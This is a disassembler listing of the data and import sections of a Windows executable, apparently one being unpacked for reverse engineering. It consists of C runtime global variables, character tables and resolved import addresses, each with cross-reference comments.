dword_4F47F8 dd 0 ; DATA XREF: _set_new_handler(int (*)(uint))+E�r
; _set_new_handler(int (*)(uint))+19�w ...
align 10h
dword_4F4800 dd 143E28h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:off_452D14�o
dword_4F4818 dd 143DB0h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:off_452D54�o
dword_4F4830 dd 143E00h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:off_452D34�o
dword_4F4848 dd 143DD8h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:off_452D44�o
dword_4F4860 dd 0 ; DATA XREF: ___sbh_decommit_pages+8B�r
; ___sbh_decommit_pages+93�w ...
dword_4F4864 dd 1 ; DATA XREF: __setmbcp:loc_42A272�r
; _getSystemCP+3�w ...
dword_4F4868 dd 0 ; DATA XREF: __stbuf+A6�r __stbuf+C9�w ...
align 10h
dword_4F4870 dd 0 ; DATA XREF: __strcmpi+C�o
; __setlocale_set_cat+82�r ...
align 8
; int dword_4F4878
dword_4F4878 dd 0 ; DATA XREF: __strupr+D�r
; __strupr:loc_4224D6�r ...
dword_4F487C dd 0 ; DATA XREF: ___init_monetary+4�r
dword_4F4880 dd 0 ; DATA XREF: ___init_numeric+18�r
dword_4F4884 dd 0 ; DATA XREF: ___init_time+4�r
dword_4F4888 dd 0 ; DATA XREF: __mbstowcs_lk+B9�r
; __mbstowcs_lk+16C�r ...
dword_4F488C dd 0 ; DATA XREF: __setlocale_set_cat+11F�w
dword_4F4890 dd 0 ; DATA XREF: __expandlocale+C7�o
; __expandlocale+140�o
word_4F4894 dw 0 ; DATA XREF: __expandlocale+E8�r
align 4
dword_4F4898 dd 0 ; DATA XREF: __expandlocale+EF�w
; __expandlocale+159�o
dword_4F489C dd 1 ; DATA XREF: ___crtLCMapStringA+26�r
; ___crtLCMapStringA+4B�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: __setargv+19�o
; __setargv+26�o ...
align 4
dd 3Ah dup(0)
dword_4F49A4 dd 1 ; DATA XREF: ___crtGetEnvironmentStringsA+14�r
; ___crtGetEnvironmentStringsA+2C�w ...
dword_4F49A8 dd 0 ; DATA XREF: __FF_MSGBANNER+2B�r
; __FF_MSGBANNER+34�r
dword_4F49AC dd 0 ; DATA XREF: .text:loc_431476�r
; .text:00431482�w ...
dword_4F49B0 dd 0 ; DATA XREF: .text:loc_43148A�r
; .text:00431495�w ...
dword_4F49B4 dd 0 ; DATA XREF: .text:loc_43149D�r
; .text:004314A9�w ...
dword_4F49B8 dd 0 ; DATA XREF: .text:loc_4314B0�r
; .text:004314BC�w ...
dword_4F49BC dd 0 ; DATA XREF: .text:loc_43140A�r
; .text:00431425�w
dword_4F49C0 dd 0 ; DATA XREF: ___crtMessageBoxA+D�r
; ___crtMessageBoxA+39�w ...
dword_4F49C4 dd 0 ; DATA XREF: ___crtMessageBoxA+5A�w
; ___crtMessageBoxA:loc_4319C3�r ...
dword_4F49C8 dd 0 ; DATA XREF: ___crtMessageBoxA+6E�w
; ___crtMessageBoxA+8B�r ...
dword_4F49CC dd 1 ; DATA XREF: ___crtGetStringTypeA+26�r
; ___crtGetStringTypeA+46�w ...
dword_4F49D0 dd 0 ; DATA XREF: __openfile+9�r
; int (__stdcall *dword_4F49D4)()
dword_4F49D4 dd 77C26E79h ; DATA XREF: __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *):loc_433DBE�r
; __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *)+37�r ...
dword_4F49D8 dd 0 ; DATA XREF: __tzset_lk+17�w
; __tzset_lk+6D�w ...
align 10h
dword_4F49E0 dd 0 ; DATA XREF: __tzset_lk+59�o
; __tzset_lk+77�r
dword_4F49E4 dd 10h dup(0) ; DATA XREF: __tzset_lk+103�o
word_4F4A24 dw 0 ; DATA XREF: sub_434320+FC�r
word_4F4A26 dw 0 ; DATA XREF: __tzset_lk+88�r
; sub_434320+145�r ...
word_4F4A28 dw 0 ; DATA XREF: sub_434320+132�r
word_4F4A2A dw 0 ; DATA XREF: sub_434320+13B�r
; sub_434320+18B�r
word_4F4A2C dw 0 ; DATA XREF: sub_434320+126�r
; sub_434320+181�r
word_4F4A2E dw 0 ; DATA XREF: sub_434320+11C�r
; sub_434320+177�r
word_4F4A30 dw 0 ; DATA XREF: sub_434320+113�r
; sub_434320+16E�r
word_4F4A32 dw 0 ; DATA XREF: sub_434320+109�r
; sub_434320+164�r
dword_4F4A34 dd 0 ; DATA XREF: __tzset_lk+93�r
; __tzset_lk+CE�r
dword_4F4A38 dd 10h dup(0) ; DATA XREF: __tzset_lk+149�o
word_4F4A78 dw 0 ; DATA XREF: sub_434320+43�r
word_4F4A7A dw 0 ; DATA XREF: __tzset_lk+AB�r
; sub_434320+8C�r ...
word_4F4A7C dw 0 ; DATA XREF: sub_434320+79�r
word_4F4A7E dw 0 ; DATA XREF: sub_434320+82�r
; sub_434320+D2�r
word_4F4A80 dw 0 ; DATA XREF: sub_434320+6D�r
; sub_434320+C8�r
word_4F4A82 dw 0 ; DATA XREF: sub_434320+63�r
; sub_434320+BE�r
word_4F4A84 dw 0 ; DATA XREF: sub_434320+5A�r
; sub_434320+B5�r
word_4F4A86 dw 0 ; DATA XREF: sub_434320+50�r
; sub_434320+AB�r
dword_4F4A88 dd 0 ; DATA XREF: __tzset_lk+B6�r
; __tzset_lk+C9�r
; char *dword_4F4A8C
dword_4F4A8C dd 0 ; DATA XREF: __tzset_lk+18D�r
; __tzset_lk+196�r ...
dword_4F4A90 dd 0 ; DATA XREF: ___tzset+3�r ___tzset+16�r ...
dword_4F4A94 dd 0 ; DATA XREF: ___init_time+75�r
; ___init_time+86�r ...
dword_4F4A98 dd 0 ; DATA XREF: ___init_numeric+25�o
; ___init_numeric+93�r ...
dword_4F4A9C dd 0 ; DATA XREF: ___init_numeric+42�o
; ___init_numeric+A3�r ...
dword_4F4AA0 dd 0 ; DATA XREF: ___init_numeric+5F�o
; ___init_numeric+7C�r ...
dword_4F4AA4 dd 0 ; DATA XREF: ___init_monetary+A0�r
; ___init_monetary+B1�r ...
dword_4F4AA8 dd 0 ; DATA XREF: unknown_libname_24+2AA�r
; unknown_libname_24+2B5�r ...
dword_4F4AAC dd 0 ; DATA XREF: unknown_libname_24+2CC�r
; unknown_libname_24+2D7�r ...
dword_4F4AB0 dd 3 dup(0) ; DATA XREF: __setlocale_set_cat+94�o
; __setlocale_set_cat+F3�o
word_4F4ABC dw 0 ; DATA XREF: unknown_libname_24+36�r
align 10h
dd 0
word_4F4AC4 dw 0 ; DATA XREF: __get_lc_lconv+F�r
align 4
db 2 dup(0)
word_4F4ACA dw 0 ; DATA XREF: ___init_numeric+F�r
db 2 dup(0)
word_4F4ACE dw 0 ; DATA XREF: __get_lc_time+F�r
word_4F4AD0 dw 0 ; DATA XREF: __get_lc_time+1A�r
align 4
dword_4F4AD4 dd 0 ; DATA XREF: ___get_qualified_locale+155�r
; ___get_qualified_locale+176�r ...
dword_4F4AD8 dd 0 ; DATA XREF: _GetLcidFromLangCountry+37�w
; LangCountryEnumProc(x)+1B�r ...
; size_t MaxCount
MaxCount dd 0 ; DATA XREF: _GetLcidFromLangCountry+6E�w
; LangCountryEnumProc(x)+101�r ...
dword_4F4AE0 dd 0 ; DATA XREF: _GetLcidFromLangCountry+1A�w
; _GetLcidFromLangCountry+47�r ...
; char *dword_4F4AE4
dword_4F4AE4 dd 0 ; DATA XREF: ___get_qualified_locale+45�w
; ___get_qualified_locale+4B�r ...
; char *dword_4F4AE8
dword_4F4AE8 dd 0 ; DATA XREF: ___get_qualified_locale+7A�w
; ___get_qualified_locale+80�r ...
dword_4F4AEC dd 0 ; DATA XREF: ___get_qualified_locale:loc_435E09�w
; ___get_qualified_locale:loc_435E6E�r ...
dword_4F4AF0 dd 0 ; DATA XREF: ___get_qualified_locale+182�r
; ___get_qualified_locale+1CB�r ...
dword_4F4AF4 dd 0 ; DATA XREF: ___get_qualified_locale+6�r
; ___get_qualified_locale+2C�w ...
dword_4F4AF8 dd 0 ; DATA XREF: __sopen:loc_4323EC�r
byte_4F4AFC db 0 ; DATA XREF: sub_439950+18F�o
; sub_439950+1F2�r ...
align 10h
dd 0
dword_4F4B04 dd 0 ; DATA XREF: __free_lc_lconv+11�o
; .data:off_45600C�o ...
dword_4F4B08 dd 0 ; DATA XREF: ___crtGetStringTypeW+26�r
; ___crtGetStringTypeW+46�w ...
dword_4F4B0C dd 0 ; DATA XREF: ___crtGetLocaleInfoW+26�r
; ___crtGetLocaleInfoW+41�w ...
dword_4F4B10 dd 0 ; DATA XREF: ___crtGetLocaleInfoA+26�r
; ___crtGetLocaleInfoA+41�w ...
dword_4F4B14 dd 0 ; DATA XREF: ___crtCompareStringA+26�r
; ___crtCompareStringA+4B�w ...
dword_4F4B18 dd 0 ; DATA XREF: ___crtLCMapStringW+26�r
; ___crtLCMapStringW+4B�w ...
byte_4F4B1C db 1 ; DATA XREF: sub_40E2EC�r sub_40E2EC+9�w
align 10h
dword_4F4B20 dd 0 ; DATA XREF: sub_438A30+90�w
; sub_438A30+A5�w ...
dword_4F4B24 dd 0 ; DATA XREF: sub_438BC0+1C4�w
; sub_438BC0+1ED�w ...
dd 6 dup(0)
dword_4F4B40 dd 941F58h ; DATA XREF: ___initstdio+ED�r
; ___initstdio+109�r ...
dd 3Fh dup(0)
dword_4F4C40 dd 20h ; DATA XREF: __close+7�r __read+7�r ...
dword_4F4C44 dd 0 ; DATA XREF: __strcmpi+5A�r
; __strupr+68�r ...
dword_4F4C48 dd 0 ; DATA XREF: __strcmpi:loc_421D83�w
; __strcmpi:loc_421D97�w ...
dword_4F4C4C dd 4E4h ; DATA XREF: __setmbcp+22�r
; __setmbcp+14A�w ...
word_4F4C50 dw 0 ; DATA XREF: __setmbcp+19A�w
; __setmbcp+2F3�w ...
align 4
dd 2 dup(0)
dword_4F4C5C dd 0 ; DATA XREF: __setmbcp+150�w
; __setmbcp+2C2�w ...
byte_4F4C60 db 0 ; DATA XREF: _setSBUpLow+1CE�w
; _setSBUpLow+21A�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
byte_4F4D60 db 0 ; DATA XREF: __setmbcp+AB�w
; __setmbcp+1F4�w ...
byte_4F4D61 db 0 ; DATA XREF: __splitpath+92�r
; __setmbcp+129�r ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_4F4E64 dd 0 ; DATA XREF: __setmbcp+169�w
; __setmbcp+205�w ...
dword_4F4E68 dd 940000h ; DATA XREF: sub_41E4D0+8D�r
; sub_41E4D0+FB�r ...
dword_4F4E6C dd 1 ; DATA XREF: sub_41E4D0:loc_41E501�r
; sub_41E4D0:loc_41E56E�r ...
dword_4F4E70 dd 0 ; DATA XREF: ___sbh_heap_init+51�w
; ___sbh_alloc_new_region+9�r ...
dword_4F4E74 dd 0 ; DATA XREF: sub_424FD0+484�r
; sub_424FD0+4B3�r ...
dword_4F4E78 dd 0 ; DATA XREF: ___sbh_heap_init+37�w
; sub_424FD0+5C1�w ...
align 10h
; void *Dst
Dst dd 0 ; DATA XREF: ___sbh_heap_init+3D�w
; sub_424FD0+477�r ...
dword_4F4E84 dd 0 ; DATA XREF: ___sbh_heap_init+47�w
; ___sbh_find_block+6�r ...
dword_4F4E88 dd 0 ; DATA XREF: ___sbh_heap_init+16�w
; ___sbh_heap_init+1B�r ...
dword_4F4E8C dd 0 ; DATA XREF: __heap_alloc_base+2F�r
; sub_424440+6D�r ...
dword_4F4E90 dd 0 ; DATA XREF: .text:00423414�r
; .text:0042341F�w ...
dword_4F4E94 dd 943250h ; DATA XREF: ___initstdio+48�w
; ___initstdio+4D�r ...
align 10h
dword_4F4EA0 dd 129h dup(0) ; DATA XREF: .data:off_452A68�o
; .data:00452A70�o
db 0
byte_4F5345 db 3 dup(0) ; DATA XREF: .data:00455B50�o
; .data:00455EA4�o
dd 43h dup(0)
dword_4F5454 dd 293h dup(0) ; DATA XREF: .data:00455D1C�o
dword_4F5EA0 dd 200h ; DATA XREF: ___initstdio+4�r
; ___initstdio+D�w ...
dword_4F5EA4 dd 142340h ; DATA XREF: start+B9�w
; __wincmdln:loc_430092�r ...
dword_4F5EA8 dd 1 ; DATA XREF: __setenvp+13B�w _getenv+E�r
dword_4F5EAC dd 1 ; DATA XREF: ___initmbctable+3�r
; ___initmbctable+16�w ...
dword_4F5EB0 dd 94241Ch ; DATA XREF: _doexit+45�r __onexit+19�r ...
dword_4F5EB4 dd 942410h ; DATA XREF: _doexit+3C�r _doexit+5A�r ...
dword_4F5EB8 dd 0 ; DATA XREF: .text:0041E734�r
; .text:0041E73F�w ...
byte_4F5EBC db 1 ; DATA XREF: sub_43B830+5�r
; sub_43B830+11�r ...
_data ends
; Section 4. (virtual address 000F6000)
; Virtual size : 00000FD0 ( 4048.)
; Section size in file : 00000FD0 ( 4048.)
; Offset to raw data for section: 000F6000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata segment para public 'DATA' use32
assume cs:_idata
;org 4F6000h
dd 0F6284h, 2 dup(0)
dd 0F65A2h, 0F6518h, 0F629Ch, 2 dup(0)
dd 0F65B8h, 0F6530h, 0F628Ch, 2 dup(0)
dd 0F6606h, 0F6520h, 0F6064h, 2 dup(0)
dd 0F6FC2h, 0F62F8h, 5 dup(0)
dd 0F69E6h, 0F6FA8h, 0F6F96h, 0F6F84h, 0F6F72h, 0F6F62h
dd 0F6F4Ch, 0F6F36h, 0F6F24h, 0F6F14h, 0F6F04h, 0F6EE6h
dd 0F6ED4h, 0F6EC2h, 0F6EAEh, 0F6E9Eh, 0F6E90h, 0F6E7Eh
dd 0F6E64h, 0F6E4Ch, 0F6E32h, 0F6E18h, 0F6DFCh, 0F6DECh
dd 0F6DDCh, 0F6DCAh, 0F6DBEh, 0F6DB4h, 0F6DA8h, 0F6612h
dd 0F6620h, 0F662Eh, 0F6640h, 0F6656h, 0F666Ch, 0F6674h
dd 0F6684h, 0F6692h, 0F66A0h, 0F66B6h, 0F66C6h, 0F66D2h
dd 0F66E8h, 0F66FEh, 0F6712h, 0F6728h, 0F6738h, 0F6748h
dd 0F675Ah, 0F676Ah, 0F6776h, 0F6786h, 0F6798h, 0F67ACh
dd 0F67BEh, 0F67CEh, 0F67DCh, 0F67F4h, 0F680Ch, 0F6834h
dd 0F684Ch, 0F6858h, 0F6868h, 0F6874h, 0F6882h, 0F6896h
dd 0F68A8h, 0F68BCh, 0F68CAh, 0F68DCh, 0F68EEh, 0F68FCh
dd 0F6908h, 0F6920h, 0F693Ah, 0F694Ah, 0F695Ch, 0F696Eh
dd 0F6986h, 0F69A0h, 0F69BCh, 0F69CCh, 0F6A02h, 0F6A10h
dd 0F6A2Ah, 0F6A36h, 0F6A42h, 0F6A54h, 0F6A66h, 0F6A7Ah
dd 0F6A8Ah, 0F6A9Ch, 0F6AACh, 0F6ABAh, 0F6ACCh, 0F6ADCh
dd 0F6AF2h, 0F6B00h, 0F6B0Eh, 0F6B2Ah, 0F6B40h, 0F6B56h
dd 0F6B62h, 0F6B78h, 0F6B88h, 0F6B9Ch, 0F6BB2h, 0F6BC2h
dd 0F6BD2h, 0F6BE2h, 0F6BEEh, 0F6C08h, 0F6C18h, 0F6C30h
dd 0F6C48h, 0F6C5Ah, 0F6C6Ch, 0F6C7Ah, 0F6C88h, 0F6C98h
dd 0F6CAEh, 0F6CCAh, 0F6CDAh, 0F6CE8h, 0F6CF6h, 0F6D06h
dd 0F6D20h, 0F6D2Eh, 0F6D3Ch, 0F6D52h, 0F6D60h, 0F6D6Ch
dd 0F6D76h, 0F6D86h, 0F6D94h, 0
dd 0F658Ch, 0
dd 0F65C4h, 0F65D6h, 0F65ECh, 0
dd 80000007h, 8000000Fh, 8000000Ch, 80000074h, 80000073h
dd 80000015h, 8000000Ah, 80000002h, 0F65AAh, 80000001h
dd 80000034h, 8000000Bh, 80000009h, 80000004h, 80000010h
dd 80000003h, 80000017h, 80000013h, 80000012h, 80000097h
dd 80000006h, 8000000Dh, 0
dword_4F62F8 dd 77E6D75Bh ; DATA XREF: sub_4135C1+182�r
; sub_414324+FF�r ...
dword_4F62FC dd 77E6BD68h ; DATA XREF: ___crtsetenv+2C5�r
; .text:0043BC46�r
dword_4F6300 dd 77E77F2Eh ; DATA XREF: ___crtCompareStringA+41�r
; ___crtCompareStringA+3DA�r ...
dword_4F6304 dd 77E762D0h ; DATA XREF: ___crtCompareStringA+69�r
; ___crtCompareStringA+D9�r ...
dword_4F6308 dd 77E78723h ; DATA XREF: ___crtGetLocaleInfoW+37�r
; ___crtGetLocaleInfoW+8B�r ...
dword_4F630C dd 77E70192h ; DATA XREF: __chsize_lk+1D8�r
; .text:0043BC2E�r
dword_4F6310 dd 77E79C94h ; DATA XREF: _GetLcidFromDefault+12�r
; .text:0043BC28�r
dword_4F6314 dd 77E6363Bh ; DATA XREF: _GetLcidFromLangCountry+7A�r
; _GetLcidFromLanguage+53�r ...
dword_4F6318 dd 77E75243h ; DATA XREF: ___get_qualified_locale+142�r
; .text:0043BC1C�r
dword_4F631C dd 77E752B8h ; DATA XREF: ___get_qualified_locale+15C�r
; .text:0043BC16�r
dword_4F6320 dd 77E7176Ch ; DATA XREF: _ValidateExecute(int (*)(void))+F�r
; .text:0043BC10�r
dword_4F6324 dd 77E7C9E7h ; DATA XREF: __CxxSetUnhandledExceptionFilter(void)+8�r
; __CxxRestoreUnhandledExceptionFilter(void)+9�r ...
dword_4F6328 dd 77E7C866h ; DATA XREF: ___crtGetStringTypeA+3C�r
; ___crtGetStringTypeA+19E�r ...
dword_4F632C dd 77E641EBh ; DATA XREF: ___crtGetStringTypeA+61�r
; ___crtGetStringTypeA+AA�r ...
dword_4F6330 dd 77E73FF9h ; DATA XREF: unknown_libname_21+7F�r
; .text:0043BBF8�r
dword_4F6334 dd 77E7FF2Eh ; DATA XREF: __set_osfhnd+58�r
; __set_osfhnd+66�r ...
dword_4F6338 dd 77E78406h ; DATA XREF: __ioinit+1E6�r
; __ioinit+29B�r ...
dword_4F633C dd 77E7C931h ; DATA XREF: __ioinit+31A�r
; .text:0043BBE6�r
dword_4F6340 dd 77E77EE1h ; DATA XREF: ___crtGetEnvironmentStringsA+1D�r
; ___crtGetEnvironmentStringsA+6D�r ...
dword_4F6344 dd 77E67702h ; DATA XREF: ___crtGetEnvironmentStringsA:loc_4307D8�r
; ___crtGetEnvironmentStringsA+171�r ...
dword_4F6348 dd 77E7C9E1h ; DATA XREF: ___crtGetEnvironmentStringsA+108�r
; ___crtGetEnvironmentStringsA+150�r ...
dword_4F634C dd 77E9C5B1h ; DATA XREF: ___crtGetEnvironmentStringsA+1E6�r
; ___crtGetEnvironmentStringsA+208�r ...
dword_4F6350 dd 77EB9A84h ; DATA XREF: __XcptFilter+37�r
; .text:0043BBC8�r
dword_4F6354 dd 77E781F9h ; DATA XREF: ___crtLCMapStringA+41�r
; ___crtLCMapStringA+1A5�r ...
dword_4F6358 dd 77E77405h ; DATA XREF: ___crtLCMapStringA+69�r
; ___crtLCMapStringA+C0�r ...
dword_4F635C dd 77E6D706h ; DATA XREF: __raise_exc+35A�r
; .text:0043BBB6�r ...
dword_4F6360 dd 77E6C703h ; DATA XREF: _getSystemCP+1D�r
; .text:0043BBB0�r
dword_4F6364 dd 77E7A13Fh ; DATA XREF: _getSystemCP+35�r
; .text:0043BBAA�r
dword_4F6368 dd 77E7849Fh ; DATA XREF: __setmbcp+1C7�r
; _setSBUpLow+17�r ...
dword_4F636C dd 77E75CB5h ; DATA XREF: sub_401317+DF�r
; WinMain(x,x,x,x)+7A�r ...
dword_4F6370 dd 77E77963h ; DATA XREF: sub_401317+B8�r
; WinMain(x,x,x,x)+2DB�r ...
dword_4F6374 dd 77E61BB8h ; DATA XREF: sub_401317+A7�r
; WinMain(x,x,x,x)+2C3�r ...
dword_4F6378 dd 77E7A099h ; DATA XREF: sub_401317+83�r
; WinMain(x,x,x,x)+DA�r ...
dword_4F637C dd 77E704FCh ; DATA XREF: sub_401317+74�r
; WinMain(x,x,x,x)+C4�r ...
dword_4F6380 dd 77E61BE6h ; DATA XREF: sub_401317+29�r
; WinMain(x,x,x,x)+1F4�r ...
dword_4F6384 dd 77E7AC37h ; DATA XREF: WinMain(x,x,x,x)+3C1�r
; sub_401CC7+790�r ...
dword_4F6388 dd 77E73628h ; DATA XREF: WinMain(x,x,x,x)+33B�r
; sub_401CC7+79CB�r ...
dword_4F638C dd 77E706B7h ; DATA XREF: WinMain(x,x,x,x)+274�r
; sub_417E1E+15�r ...
dword_4F6390 dd 77E80656h ; DATA XREF: WinMain(x,x,x,x)+267�r
; .text:0043B958�r
dword_4F6394 dd 77F5157Dh ; DATA XREF: WinMain(x,x,x,x)+1D8�r
; WinMain(x,x,x,x)+3E6�r ...
dword_4F6398 dd 77E6BD13h ; DATA XREF: WinMain(x,x,x,x):loc_4015D6�r
; .text:0041C0E1�r ...
dword_4F639C dd 77E70396h ; DATA XREF: WinMain(x,x,x,x)+1B5�r
; WinMain(x,x,x,x)+221�r ...
dword_4F63A0 dd 77E74CABh ; DATA XREF: WinMain(x,x,x,x)+19E�r
; sub_41016C+110�r ...
dword_4F63A4 dd 77E79F93h ; DATA XREF: WinMain(x,x,x,x)+D3�r
; sub_409E0C+2�r ...
dword_4F63A8 dd 77E79D5Bh ; DATA XREF: WinMain(x,x,x,x)+6B�r
; WinMain(x,x,x,x)+311�r ...
dword_4F63AC dd 77E7C2C4h ; DATA XREF: WinMain(x,x,x,x)+64�r
; .text:0043B982�r
dword_4F63B0 dd 77E7751Ah ; DATA XREF: WinMain(x,x,x,x)+2C�r
; sub_401CC7+2555�r ...
dword_4F63B4 dd 77E75CEBh ; DATA XREF: sub_401CC7+7C23�r
; sub_40B8C9+2B�r ...
dword_4F63B8 dd 77E6AD34h ; DATA XREF: sub_401CC7+6AFF�r
; sub_41912E+35�r ...
dword_4F63BC dd 77E71AFEh ; DATA XREF: sub_401CC7+68C7�r
; .text:0043B99A�r
dword_4F63C0 dd 77E805D8h ; DATA XREF: sub_409E0C+13A�r
; sub_409E0C:loc_40A31A�r ...
dword_4F63C4 dd 77E7A5FDh ; DATA XREF: sub_409E0C+11�r
; sub_417AC3+60�r ...
dword_4F63C8 dd 77E65F4Ch ; DATA XREF: sub_40B1BA+26�r
; sub_41A498+34�r ...
dword_4F63CC dd 77E7513Ch ; DATA XREF: sub_40B260+22�r
; ___get_qualified_locale+18�r ...
dword_4F63D0 dd 77E7C657h ; DATA XREF: sub_40B2D5+21�r
; sub_4192B6+32�r ...
dword_4F63D4 dd 77E73C49h ; DATA XREF: sub_40B7F9+4A�r
; sub_40BF39+1AF�r ...
dword_4F63D8 dd 77F7E300h ; DATA XREF: sub_40C989+142�r
; __unlock_file+35�r ...
dword_4F63DC dd 77F7E21Fh ; DATA XREF: sub_40C989+D7�r
; __lock_file+35�r ...
dword_4F63E0 dd 77E7C706h ; DATA XREF: sub_40CBA1+77�r
; .text:0043B9D0�r
dword_4F63E4 dd 77F53275h ; DATA XREF: sub_40CBA1+6B�r
; sub_40CBA1+22F�r ...
dword_4F63E8 dd 77E79D8Ch ; DATA XREF: sub_40E311+94�r
; sub_40E3FF+184�r ...
dword_4F63EC dd 77E737DEh ; DATA XREF: sub_40E3FF+43D�r
; .text:0043B9E2�r
dword_4F63F0 dd 77E78B82h ; DATA XREF: sub_40E3FF+1AC�r
; sub_40E3FF+49C�r ...
dword_4F63F4 dd 77E7A837h ; DATA XREF: sub_40E3FF+AA�r
; sub_41016C+1CB�r ...
dword_4F63F8 dd 77E616B4h ; DATA XREF: sub_40EFAC+19B�r
; sub_41178E+115�r ...
dword_4F63FC dd 77E79CE3h ; DATA XREF: sub_40EFAC+111�r
; sub_4119D8+77�r ...
dword_4F6400 dd 77E79C90h ; DATA XREF: sub_40EFAC+FD�r
; sub_40EFAC+10A�r ...
dword_4F6404 dd 77E7727Ah ; DATA XREF: sub_40EFAC+74�r
; sub_4118DF+23�r ...
dword_4F6408 dd 77E64106h ; DATA XREF: sub_40FFE9+A0�r
; sub_41B964+1B6�r ...
dword_4F640C dd 77E64006h ; DATA XREF: sub_40FFE9+8C�r
; sub_41B964+19F�r ...
dword_4F6410 dd 77E793EFh ; DATA XREF: sub_41016C+1F5�r
; sub_410AA9+38�r ...
dword_4F6414 dd 77E78EAAh ; DATA XREF: sub_410423+5EC�r
; sub_417975+BA�r ...
dword_4F6418 dd 77E79424h ; DATA XREF: sub_410423+280�r
; sub_417E1E+135�r ...
dword_4F641C dd 77E794BFh ; DATA XREF: sub_410423+272�r
; sub_417E1E+123�r ...
dword_4F6420 dd 77E75E67h ; DATA XREF: sub_410423+212�r
; sub_410423+5DB�r ...
dword_4F6424 dd 77E75D9Eh ; DATA XREF: sub_410423+201�r
; sub_417975+26�r ...
dword_4F6428 dd 77E78C81h ; DATA XREF: sub_410AA9+6C�r
; sub_4169B8+259�r ...
dword_4F642C dd 77E76968h ; DATA XREF: sub_411506+5F�r
; .text:0043141A�r ...
dword_4F6430 dd 77E74C59h ; DATA XREF: sub_41178E+C7�r
; .text:0043BA48�r
dword_4F6434 dd 77EC7C51h ; DATA XREF: sub_411B63+5E�r
; .text:0043BA4E�r
dword_4F6438 dd 77E70F89h ; DATA XREF: sub_4126CC+E�r
; sub_415C77+D�r ...
dword_4F643C dd 77E802FCh ; DATA XREF: sub_4135C1+18C�r
; sub_4135C1+2D4�r ...
dword_4F6440 dd 77E80618h ; DATA XREF: sub_417AC3+170�r
; sub_4194A9+D4�r ...
dword_4F6444 dd 77E78147h ; DATA XREF: sub_417AC3+BC�r
; .text:0043BA6C�r
dword_4F6448 dd 77F51597h ; DATA XREF: sub_417C95+41�r
; sub_417C95+F5�r ...
dword_4F644C dd 77F516F8h ; DATA XREF: sub_417C95+21�r
; sub_417E1E+4A�r ...
dword_4F6450 dd 77E77CB7h ; DATA XREF: sub_417C95+10�r
; sub_417E1E+40�r ...
dword_4F6454 dd 77E7F01Ah ; DATA XREF: sub_417E1E+88�r
; sub_417FC5+55�r ...
dword_4F6458 dd 77E61A54h ; DATA XREF: sub_417E1E+56�r
; sub_417FC5+97�r ...
dword_4F645C dd 77E7C3A5h ; DATA XREF: sub_417E1E+34�r
; sub_417FC5+2E�r ...
dword_4F6460 dd 77E76A60h ; DATA XREF: sub_418E9D+2D�r
; .text:0043BA96�r
dword_4F6464 dd 77E71B14h ; DATA XREF: sub_418F27+26�r
; .text:0043BA9C�r
dword_4F6468 dd 77E7166Fh ; DATA XREF: sub_418F27+1D�r
; .text:0043BAA2�r
dword_4F646C dd 77E75090h ; DATA XREF: sub_418F62+6C�r
; .text:0043BAA8�r
dword_4F6470 dd 77E74D76h ; DATA XREF: sub_418F62+39�r
; .text:0043BAAE�r
dword_4F6474 dd 77E77797h ; DATA XREF: sub_418F62+28�r
; .text:0043BAB4�r
dword_4F6478 dd 77E7011Ah ; DATA XREF: sub_418FE7+96�r
; .text:0041C581�r ...
dword_4F647C dd 77E73CE2h ; DATA XREF: sub_418FE7+60�r
; .text:0041C261�r ...
dword_4F6480 dd 77E668D9h ; DATA XREF: sub_41912E+15D�r
; .text:0043BAC6�r
dword_4F6484 dd 77E79924h ; DATA XREF: sub_419A5D+13�r
; ___crtLCMapStringA+2A5�r ...
dword_4F6488 dd 77E77CCEh ; DATA XREF: sub_419B2F+F�r
; sub_41C0EF+1E�r ...
dword_4F648C dd 77E76A2Eh ; DATA XREF: sub_41A5C1+DE�r
; .text:0043BAD8�r
dword_4F6490 dd 77E7FF65h ; DATA XREF: sub_41AA28+5A�r
; .text:0043BADE�r
dword_4F6494 dd 77EB7624h ; DATA XREF: sub_41AA28+3D�r
; .text:0043BAE4�r
dword_4F6498 dd 77E6C29Dh ; DATA XREF: sub_41B0B9+1EA�r
; .text:0043BAEA�r
dword_4F649C dd 77E76C1Ah ; DATA XREF: sub_41B964+1CF�r
; .text:0043BAF0�r
dword_4F64A0 dd 77E73196h ; DATA XREF: __CrtIsValidPointer+2A�r
; ___sbh_heap_check+19�r ...
dword_4F64A4 dd 77E7339Ch ; DATA XREF: __CrtIsValidPointer+12�r
; sub_433E30+13�r ...
dword_4F64A8 dd 77E6C924h ; DATA XREF: sub_41E4D0+93�r
; sub_41E4D0+102�r ...
dword_4F64AC dd 77F6183Eh ; DATA XREF: sub_43BB08�r
dword_4F64B0 dd 77E76E3Dh ; DATA XREF: _time+9F�r __tzset_lk+5E�r ...
